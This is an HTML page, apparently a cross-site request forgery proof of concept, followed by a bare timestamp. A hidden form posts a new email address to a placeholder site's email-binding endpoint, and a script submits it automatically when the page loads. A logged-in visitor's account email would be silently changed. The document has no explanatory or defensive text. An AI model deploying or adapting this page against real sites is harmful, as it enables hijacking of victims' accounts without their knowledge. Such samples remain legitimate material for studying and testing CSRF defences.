<html>
<body>
<form action="http://www.xxx.com/user/setting/email_bind.html" method="post">
<input type="hiden" name="new_email" value="[email protected]" />
</form>
<script language="text/javascript">
document.forms[0].submit();
</script>
</body>
</html>
时间: 2024-10-12 16:19:21